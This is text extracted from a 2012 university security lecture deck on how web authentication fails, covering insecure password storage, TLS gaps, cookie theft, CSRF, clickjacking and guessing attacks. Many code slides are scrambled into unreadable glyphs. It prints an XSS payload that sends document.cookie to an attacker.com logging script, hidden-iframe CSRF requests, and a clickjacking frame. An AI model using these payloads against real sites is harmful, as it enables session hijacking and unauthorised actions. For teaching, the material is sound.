user authentication on the web
play

User authentication on the web Joseph Bonneau - PowerPoint PPT Presentation

Feb 01, 2023 •397 likes •1.72k views

User authentication on the web Joseph Bonneau Computer Laboratory Part II Security lecture 2012 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 1 / 41

  1. Recovery ❍✐ ❥❜♦♥♥❡❛✉✱ ❙♦♠❡♦♥❡ r❡q✉❡st❡❞ t❤❛t ②♦✉r ▲❛st✳❢♠ ♣❛ss✇♦r❞ ❜❡ r❡s❡t✳ ■❢ t❤✐s ✇❛s♥✬t ②♦✉✱ t❤❡r❡✬s ♥♦t❤✐♥❣ t♦ ✇♦rr② ❛❜♦✉t ✲ s✐♠♣❧② ✐❣♥♦r❡ t❤✐s ❡♠❛✐❧ ❛♥❞ ♥♦t❤✐♥❣ ✇✐❧❧ ❝❤❛♥❣❡✳ ■❢ ②♦✉ ❉■❉ ❛s❦ t♦ r❡s❡t t❤❡ ♣❛ss✇♦r❞ ♦♥ ②♦✉r ▲❛st✳❢♠ ❛❝❝♦✉♥t✱ ❥✉st ❝❧✐❝❦ ❤❡r❡ t♦ ♠❛❦❡ ✐t ❤❛♣♣❡♥✿ ❤tt♣✿✴✴✇✇✇✳❧❛st✳❢♠✴❄✐❞❂❁✉s❡r✐❞❃ ✫❦❡②❂❁❛✉t❤❡♥t✐❝❛t✐♦♥✲t♦❦❡♥❃ ❇❡st ❘❡❣❛r❞s✱ ❚❤❡ ▲❛st✳❢♠ ❚❡❛♠ J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 10 / 41

  2. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 11 / 41

  3. Plaintext passwords sent over SMTP ❉❡❛r ❏♦s❡♣❤ ❇♦♥♥❡❛✉✱ ❨♦✉ r❡q✉❡st❡❞ ✉s t♦ s❡♥❞ ②♦✉ ②♦✉r ❊❛s②❈❤❛✐r ❧♦❣✐♥ ✐♥❢♦r♠❛t✐♦♥✳ P❧❡❛s❡ ✉s❡ t❤❡ ❢♦❧❧♦✇✐♥❣ ❞❛t❛ t♦ ❧♦❣ ✐♥ t♦ ❊❛s②❈❤❛✐r✿ ❯s❡r ♥❛♠❡✿ ❥❜♦♥♥❡❛✉ P❛ss✇♦r❞✿ q✇❡rt② ❇❡st r❡❣❛r❞s✱ ❊❛s②❈❤❛✐r ▼❡ss❡♥❣❡r✳ Password recovery, EasyChair J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 12 / 41

  4. Insecure at-rest storage of passwords 29-50% of sites store passwords in the clear J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 13 / 41

  5. Insecure at-rest storage of passwords RockYou SQL injection hack January 2010 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 13 / 41

  6. Incomplete TLS deployment J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 14 / 41

  7. Incomplete TLS deployment Password sniffing J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 14 / 41

  8. Incomplete TLS deployment ❁❢♦r♠ ♠❡t❤♦❞❂✧♣♦st✧ ❛❝t✐♦♥❂✧❤tt♣s✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴✉s❡r❴❧♦❣✐♥✳❝❣✐✧❃ ❯s❡r♥❛♠❡✿ ❁✐♥♣✉t t②♣❡❂✧t❡①t✧ ♥❛♠❡❂✧✉s❡r✧ ✴❃ ❁❜r ✴❃ P❛ss✇♦r❞✿ ❁✐♥♣✉t t②♣❡❂✧♣❛ss✇♦r❞✧ ♥❛♠❡❂✧♣❛ss✧ ✴❃ ❁❜r ✴❃ ❁✐♥♣✉t t②♣❡❂✧s✉❜♠✐t✧ ♥❛♠❡❂✧s✉❜♠✐t✧ ✴❃ ❁✴❢♦r♠❃ Post-only TLS deployment J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 14 / 41

  9. Incomplete TLS deployment TLS Deployment I E C Tot. Full 0.07 0.26 0.07 0.39 Full/POST 0.02 0.01 0.01 0.03 Inconsistent 0.09 0.04 0.03 0.17 None 0.15 0.03 0.23 0.41 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 14 / 41

  10. Cookie theft post-TLS Wireshark J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 15 / 41

  11. Cookie theft post-TLS Firesheep J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 15 / 41

  12. Cookie stealing via cross-site scripting J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 16 / 41

  13. Cookie stealing via cross-site scripting ❨♦✉r s✉❜♠✐ss✐♦♥ ✇✐❧❧ r❡❢❡r❡♥❝❡✿❁❜r✴❃ ❤tt♣✿✇✇✇✳❡s♣♥✳❝♦♠✴❝♦❧❧❡❣❡✲❢♦♦t❜❛❧❧ http://dynamic.espn.go.com/bugs? url=http:www.espn.com/college-football J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 16 / 41

  14. Cookie stealing via cross-site scripting ❨♦✉r s✉❜♠✐ss✐♦♥ ✇✐❧❧ r❡❢❡r❡♥❝❡✿❁❜r✴❃ ❁s❝r✐♣t❃ ❞♦❝✉♠❡♥t✳❧♦❝❛t✐♦♥ ❂ ✧❤tt♣✿✴✴✇✇✇✳❛tt❛❝❦❡r✳❝♦♠✴❝♦♦❦✐❡✲❧♦❣✳❝❣✐❄✧ ✰ ❞♦❝✉♠❡♥t✳❝♦♦❦✐❡ ❁✴s❝r✐♣t❃ http://dynamic.espn.go.com/bugs? url=%3Cscript%3E%0Adocument.location +%3D%0A%22http%3A//www.attacker.com/cookie- log.cgi%3F%22%0A%2B+document.cookie%0A%3C/script%3E J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 16 / 41

  15. Weak cookies ❙■❉ ❯■❉ ❖t❤❡r ❞❛t❛ ✸✾✹✸✹✶✷✺✽✻ r❥❛✶✹ ✳✳✳ ✸✾✹✸✹✶✷✺✽✼ ♠❣❦✷✺ ✳✳✳ ✸✾✹✸✹✶✷✺✽✽ ❥❝❜✽✷ ✳✳✳ ✳✳✳ ✳✳✳ ✳✳✳ Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  16. Weak cookies ❙■❉ ❯■❉ ❖t❤❡r ❞❛t❛ ✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✻✿✹✸ r❥❛✶✹ ✳✳✳ ✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✼✿✸✽ ♠❣❦✷✺ ✳✳✳ ✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✽✿✶✶ ❥❝❜✽✷ ✳✳✳ ✳✳✳ ✳✳✳ ✳✳✳ Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  17. Weak cookies ❙■❉ ❯■❉ ❖t❤❡r ❞❛t❛ H ✭✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✻✿✹✸✮ r❥❛✶✹ ✳✳✳ H ✭✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✼✿✸✽✮ ♠❣❦✷✺ ✳✳✳ H ✭✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✽✿✶✶✮ ❥❝❜✽✷ ✳✳✳ ✳✳✳ ✳✳✳ ✳✳✳ Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  18. Weak cookies COOKIE i = i || ❝r②♣t ( i || K daily ) Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  19. Weak cookies COOKIE i = i || ❝r②♣t ( i || K daily ) COOKIE jbonneau = jbonneau7c19f550a775b614 COOKIE jbonneau1 = jbonneau17c19f550a775b614 Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  20. Weak cookies COOKIE i = i || ❝r②♣t ( i || K daily ) COOKIE jbonnea jbonneac6ceb34c403d1f6d = COOKIE jbonneaN = jbonneaNc6ceb34c403d1f6d COOKIE j = j938c00d2f12c73a4 COOKIE jNov201999 = jNov201999938c00d2f12c73a4 Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  21. Weak cookies COOKIE i = i || t || MAC k ( i || t ) Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  22. Weak cookies COOKIE i = i || t || MAC k ( i || t ) COOKIE jcb82 ( 1-Dec-2010 ) = ❥❝❜✽✷✶✲❉❡❝✲✷✵✶✵✺❝❛✺✼✺✶✷❢✹❞❜✽❢❞✶✽✷✺✹❛❞❝❡✾❜✽❡❢✹✸✽ = COOKIE jcb8 ( 21-Dec-2010 ) Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 17 / 41

  23. Cross-site request forgery ❁✐❢r❛♠❡ ♥❛♠❡❂✧❝sr❢✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣✿✴✴❜❛♥❦✳❡①❛♠♣❧❡✳❝♦♠✴tr❛♥s❢❡r❄ ✫❛♠♦✉♥t❂✶✵✵✵✵✵✵✫t♦❂❛tt❛❝❦❡r✧❃ ❁✴✐❢r❛♠❡❃ J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 18 / 41

  24. Cross-site request forgery ❁✐❢r❛♠❡ ♥❛♠❡❂✧❝sr❢✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣✿✴✴t✇✐tt❡r✳❝♦♠✴s❤❛r❡✴✉♣❞❛t❡❄ st❛t✉s❂✐✪✷✵❣♦t✪✷✵♣✇♥❡❞✧❃ ❁✴✐❢r❛♠❡❃ J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 18 / 41

  25. Clickjacking http://www.facebook.com/connect/uiserver.php?app_id=102452128776 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 19 / 41

  26. Clickjacking ❁✐❢r❛♠❡ ♥❛♠❡❂✧❝sr❢✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣✿✴✴✇✇✇✳❢❛❝❡❜♦♦❦✳❝♦♠✴❝♦♥♥❡❝t✴ ✉✐s❡r✈❡r✳♣❤♣❄❛♣♣❴✐❞❂✶✵✷✹✺✷✶✷✽✼✼✻✧ st②❧❡❂✧♦♣❛❝✐t②✿ ✵❀ ❢✐❧t❡r✿ ❛❧♣❤❛✭♦♣❛❝✐t②❂✵✮❀ ♣♦s✐t✐♦♥✿ ❛❜s♦❧✉t❡❀t♦♣✿ ✲✶✼✵♣①❀❧❡❢t✿ ✲✹✶✽♣①❀✧❃ ❁✴✐❢r❛♠❡❃ ❁✐♠❣ sr❝❂✧❝❧✐❝❦❥❛❝❦✐♥❣❴❜❛✐t✳❥♣❣✧❃ J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 19 / 41

  27. Clickjacking J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 19 / 41

  28. Clickjacking J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 19 / 41

  29. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 20 / 41

  30. No trusted path between users and browser (a) Hand tracking analysis. Rectangles identify regions in movement. Black rectangles are used for movements in the hands regions, grey rectangles for keys, white rectangles for regions where both hand and key movement happens. These rectangles identify likely key pressings. (b) Key pressing analysis. Using occlusion-based techniques, the analysis determines keys that are not pressed, which are represented by the dark polygons. Balzarotti et al. 2008 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 21 / 41

  31. No trusted path between users and browser Hardware keylogger, US$36 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 21 / 41

  32. No trusted path between users and browser Software keylogger, US$49.50 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 21 / 41

  33. No trusted path between users and browser Phishing (Firefox) J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 21 / 41

  34. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 22 / 41

  35. Brute-force attacks 123456 12345 123456789 password iloveyou princess 1234567 rockyou 12345678 abc123 nicole daniel babygirl monkey lovely jessica 654321 michael J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 23 / 41

  36. Brute-force attacks Rate limiting (Truthdig) J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 23 / 41

  37. Brute-force attacks Forced reset (Cafe Press) J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 23 / 41

  38. Brute-force attacks CAPTCHA restrictions (Wikipedia) J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 23 / 41

  39. Brute-force attacks countermeasure I E C Tot. CAPTCHA 0.07 0.01 0.01 0.09 timeout 0.01 0.01 0.01 0.03 reset 0.01 0.02 0.01 0.03 none 0.25 0.29 0.31 0.84 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 23 / 41

  40. Brute-force attacks limit I E C Tot. 3 0.02 0.00 0.00 0.02 4 0.01 0.01 0.00 0.01 5 0.02 0.01 0.03 0.06 6 0.01 0.01 0.00 0.03 7 0.01 0.00 0.00 0.01 10 0.01 0.00 0.00 0.01 15 0.01 0.00 0.00 0.01 20 0.00 0.01 0.00 0.01 25 0.01 0.00 0.00 0.01 > 100 0.25 0.29 0.31 0.84 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 23 / 41

  41. Brute-force attacks 35 30 25 µ α (bits) 20 marginal work ˜ 15 Yahoo! [2011] Battlefield Heroes [2011] 10 Gawker [2010] RockYou [2009] 5 Morris [79] Klein [90] 0 0 . 0 0 . 2 0 . 4 0 . 6 0 . 8 1 . 0 success rate α J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 23 / 41

  42. Personal knowledge questions J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 24 / 41

  43. Personal knowledge questions Web search Used against Sarah Palin in 2008 Public records Griffith et. al: 30% of individual’s mother’s maiden names Social engineering Dumpster diving, burglary Acquaintance attacks Schecter et. al: ∼ 25% of questions guessed by friends, family J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 24 / 41

  44. Personal knowledge questions 70% of answers are proper names (Just et al. 2008) 25% surname 10% forename 15% pet name 20% place name Most others are trivially insecure ❲❤❛t ✐s ♠② ❢❛✈♦✉r✐t❡ ❝♦❧♦✉r❄ ❲❤❛t ✐s t❤❡ ✇♦rst ❞❛② ♦❢ t❤❡ ✇❡❡❦❄ J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 24 / 41

  45. Personal knowledge questions 40 35 30 Forename µ α marginal guesswork ˜ 25 Surname Password [RockYou] 20 Password [Klein] Password [Spafford] 15 Password [Schneier] 10 5 0 0 . 0 0 . 2 0 . 4 0 . 6 0 . 8 1 . 0 success rate α Personal knowledge worse than passwords (Bonneau et al. 2010) J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 24 / 41

  46. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 25 / 41

  47. Systemic trends in web authentication 1 . 0 0 . 8 Proportion of sites collecting passwords 0 . 6 0 . 4 0 . 2 0 . 0 0 100 200 300 400 500 Traffic rank All sites collect passwords All sites utilise email infrastructure Naming Liveness checks Password recovery J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 26 / 41

  48. Systemic trends in web authentication All sites collect passwords All sites utilise email infrastructure Naming Liveness checks Password recovery J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 26 / 41

  49. Economic models Password over-collection is a tragedy of the commons Password insecurity is a negative externality J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 27 / 41

  50. Economic models Password over-collection is a tragedy of the commons Password insecurity is a negative externality J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 27 / 41

  51. Consequences 1 . 0 0 . 8 Proportion of sites collecting passwords 0 . 6 0 . 4 0 . 2 0 . 0 0 100 200 300 400 500 Traffic rank Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 28 / 41

  52. Consequences 10 password score page views per million 0 1E-2 1E-1 1E+0 1E+1 1E+2 1E+3 1E+4 1E+5 E-commerce News/Customization User interaction Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 28 / 41

  53. Consequences Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 28 / 41

  54. Consequences Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 28 / 41

  55. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 29 / 41

  56. Implicit identifiers ❙❘❈✿ ✶✷✽✳✷✸✷✳✽✳✶✻✽ ❉❙❚✿ ✶✷✽✳✷✸✷✳✵✳✷✵ ✳✳✳ IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  57. Implicit identifiers ●❊❚ ✴ ❍❚❚P✴✶✳✶ ❍♦st✿ ✇✇✇✳❝❧✳❝❛♠✳❛❝✳✉❦ ❯s❡r✲❆❣❡♥t✿ ▼♦③✐❧❧❛✴✺✳✵ ✭❳✶✶❀ ❯❀ ▲✐♥✉① ✐✻✽✻❀ ❡♥✲●❇❀ r✈✿✶✳✾✳✷✳✶✷✮ ●❡❝❦♦✴✷✵✶✵✶✵✷✼ ❯❜✉♥t✉✴✾✳✶✵ ✭❦❛r♠✐❝✮ ❋✐r❡❢♦①✴✸✳✻✳✶✷ ❆❝❝❡♣t✿ t❡①t✴❤t♠❧✱ ❛♣♣❧✐❝❛t✐♦♥✴①❤t♠❧✰①♠❧✱ ❛♣♣❧✐❝❛t✐♦♥✴①♠❧❀ q❂✵✳✾✱✯✴✯ ❆❝❝❡♣t✲▲❛♥❣✉❛❣❡✿ ❡♥✲❣❜✱❡♥❀q❂✵✳✺ ❆❝❝❡♣t✲❊♥❝♦❞✐♥❣✿ ❣③✐♣✱❞❡❢❧❛t❡ ❆❝❝❡♣t✲❈❤❛rs❡t✿ ■❙❖✲✽✽✺✾✲✶✱✉t❢✲✽❀q❂✵✳✼✱✯❀ IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  58. Implicit identifiers ●❊❚ ✴ ❍❚❚P✴✶✳✶ ❍♦st✿ ✇✇✇✳❝❧✳❝❛♠✳❛❝✳✉❦ ❘❡❢❡r❡r✿ ❤tt♣✿✴✴✇✇✇✳❜✐♥❣✳❝♦♠✴s❡❛r❝❤❄ q❂✇❤❛t✪✷✼s✰t❤❡✰❜❡st✰✉♥✐✈❡rs✐t② IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  59. Implicit identifiers ●❊❚ ✴ ❍❚❚P✴✶✳✶ ❍♦st✿ ✇✇✇✳❝❧✳❝❛♠✳❛❝✳✉❦ ❘❡❢❡r❡r✿ ❤tt♣✿✴✴✇✇✇✳❢❛❝❡❜♦♦❦✳❝♦♠✴♣r♦❢✐❧❡✳♣❤♣❄ ✐❞❂✶✺✶✶✸✺✾✹✻✺ IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  60. Implicit identifiers ✴✴❞❡t❡❝t s❝r❡❡♥ r❡s♦❧✉t✐♦♥ ① ❂ s❝r❡❡♥✳✇✐❞t❤❀ ② ❂ s❝r❡❡♥✳❤❡✐❣❤t❀ ✴✴❞❡t❡❝t ♣❧✉❣✐♥s q ❂ ♥❛✈✐❣❛t♦r✳♠✐♠❡❚②♣❡s❬✧✈✐❞❡♦✴q✉✐❝❦t✐♠❡✧❪❀ ❥ ❂ ♥❛✈✐❣❛t♦r✳❥❛✈❛❊♥❛❜❧❡❞✭✮❀ ✴✴❞❡t❡❝t t✐♠❡ ③♦♥❡ t③ ❂ ✭♥❡✇ ❉❛t❡✭✮✮✳❣❡t❚✐♠❡③♦♥❡❖❢❢s❡t✭✮❀ IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  61. Implicit identifiers IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  62. Implicit identifiers ★ ❙❡♥❞ ✉s❡rs t♦ ♠② ❞❡t❡❝t♦r✳✳✳ ❁✐❢r❛♠❡ ♥❛♠❡❂✧❞❡t❡❝t♦r✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣s✿✴✴❞♦❝s✳❣♦♦❣❧❡✳❝♦♠✴❞♦❝✉♠❡♥t✴❞✴ ✶❚❯❱✾①✶❧❋❆◗❝❱❲✈❤P✹❊❆❍◗❩■Pr❱♠♦✸❴✈r③✺❙③✽❲♦✧❃ ❁✴✐❢r❛♠❡❃ Narayanan 2009 IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  63. Implicit identifiers Narayanan 2009 IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  64. Implicit identifiers ❁✐♠❣ ✐❞❂✧t❡st✧ st②❧❡❂✧❞✐s♣❧❛②✿♥♦♥❡✧❃ ❁s❝r✐♣t❃ t❡st ❂ ❞♦❝✉♠❡♥t✳❣❡t❊❧❡♠❡♥t❇②■❞✭✬t❡st✬✮❀ ✈❛r st❛rt ❂ ♥❡✇ ❉❛t❡✭✮❀ t❡st✳♦♥❡rr♦r ❂ ❢✉♥❝t✐♦♥✭✮ ④ t✐♠❡ ❂ ♥❡✇ ❉❛t❡✭✮ ✲ st❛rt❀⑥ t❡st✳sr❝ ❂ ✏✧❤tt♣✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴✑❀ ❁✴s❝r✐♣t❃ Bortz et al. 2007 IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 30 / 41

  65. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 31 / 41

  66. Password alternatives Mitigates: Guessing attacks, phishing?, malware J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 32 / 41

  67. Password alternatives Mitigates: Guessing attacks, malware? J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 32 / 41

  68. Password alternatives Mitigates: Brute-force attacks?, trawling attacks? J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 32 / 41

  69. Password alternatives 40 35 Forename 30 Surname µ α Password [RockYou] marginal guesswork ˜ 25 Password [Klein] Password [Spafford] 20 Password [Schneier] Mnemonic [Kuo] 15 Pass-Go PassPoints 10 Passfaces 5 0 0 . 0 0 . 2 0 . 4 0 . 6 0 . 8 1 . 0 success rate α J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 32 / 41

  70. Better password choices Microsoft password advice Mitigates: Password guessing J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 33 / 41

  71. Better password choices To construct a good password, create a simple sentence of 8 words and choose letters from the words to make up a password. You might take the initial or final letters; you should put some letters in upper case to make the password harder to guess; and at least one number and/or special character should be inserted as well. Use this method to generate a password of 7 or 8 characters. Yan et al. 2004 Mitigates: Password guessing J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 33 / 41

  72. Better password choices 40 35 30 Forename µ α marginal guesswork ˜ Surname 25 Password [RockYou] Password [Klein] 20 Password [Spafford] Password [Schneier] 15 Mnemonic [Kuo] 10 5 0 0 . 0 0 . 2 0 . 4 0 . 6 0 . 8 1 . 0 success rate α J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 33 / 41

  73. Better password choices Mitigates: Password guessing J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 33 / 41

  74. Better password choices t✇ttr✳❇❆◆◆❊❉❴P❆❙❙❲❖❘❉❙ ❂ ❬ ✧✵✵✵✵✵✵✧✱ ✧✶✶✶✶✶✶✧✱ ✧✶✶✶✶✶✶✶✶✧✱ ✧✶✶✷✷✸✸✧✱ ✧✶✷✶✷✶✷✧✱ ✧✶✷✸✶✷✸✧✱ ✧✶✷✸✹✺✻✧✱ ✧✶✷✸✹✺✻✼✧✱ ✧✶✷✸✹✺✻✼✽✧✱ ✧✶✷✸✹✺✻✼✽✾✧✱ ✧✶✸✶✸✶✸✧✱ ✧✷✸✷✸✷✸✧✱ ✧✻✺✹✸✷✶✧✱ ✧✻✻✻✻✻✻✧✱ ✧✻✾✻✾✻✾✧✱ ✧✼✼✼✼✼✼✧✱ ✧✼✼✼✼✼✼✼✧✱ ✧✽✻✼✺✸✵✾✧✱ ✧✾✽✼✻✺✹✧✱ ✧❛❛❛❛❛❛✧✱ ✧❛❜❝✶✷✸✧✱ ✧❛❜❝✶✷✸✧✱ ✧❛❜❝❞❡❢✧✱ ✧❛❜❣rt②✉✧✱ ✧❛❝❝❡ss✧✱ ✧❛❝❝❡ss✶✹✧✱ ✧❛❝t✐♦♥✧✱ ✧❛❧❜❡rt✧✱ ✧❛❧❜❡rt♦✧✱ ✧❛❧❡①✐s✧✱ ✧❛❧❡❥❛♥❞r❛✧✱ ✧❛❧❡❥❛♥❞r♦✧✱ ✧❛♠❛♥❞❛✧✱ ✧❛♠❛t❡✉r✧✱ ✧❛♠❡r✐❝❛✧✱ ✧❛♥❞r❡❛✧✱ ✧❛♥❞r❡✇✧✱ ✧❛♥❣❡❧❛✧✱ ✧❛♥❣❡❧s✧✱ ✧❛♥✐♠❛❧✧✱ ✧❛♥t❤♦♥②✧✱ ✧❛♣♦❧❧♦✧✱ ✧❛♣♣❧❡s✧✱ ✧❛rs❡♥❛❧✧✱ ✧❛rt❤✉r✧✱ ✧❛s❞❢❣❤✧✱ ✧❛s❞❢❣❤✧✱ ✧❛s❤❧❡②✧✱ ✧❛ss❤♦❧❡✧✱ ✧❛✉❣✉st✧✱ ✧❛✉st✐♥✧✱ ✧❜❛❞❜♦②✧✱ ✧❜❛✐❧❡②✧✱ ✧❜❛♥❛♥❛✧✱ ✧❜❛r♥❡②✧✱ ✧❜❛s❡❜❛❧❧✧✱ ✧❜❛t♠❛♥✧✱ ✧❜❡❛tr✐③✧✱ ✧❜❡❛✈❡r✧✱ ✧❜❡❛✈✐s✧✱ ✧❜✐❣❝♦❝❦✧✱ ✧❜✐❣❞❛❞❞②✧✱ ✧❜✐❣❞✐❝❦✧✱ ✧❜✐❣❞♦❣✧✱ ✧❜✐❣t✐ts✧✱ ✧❜✐r❞✐❡✧✱ 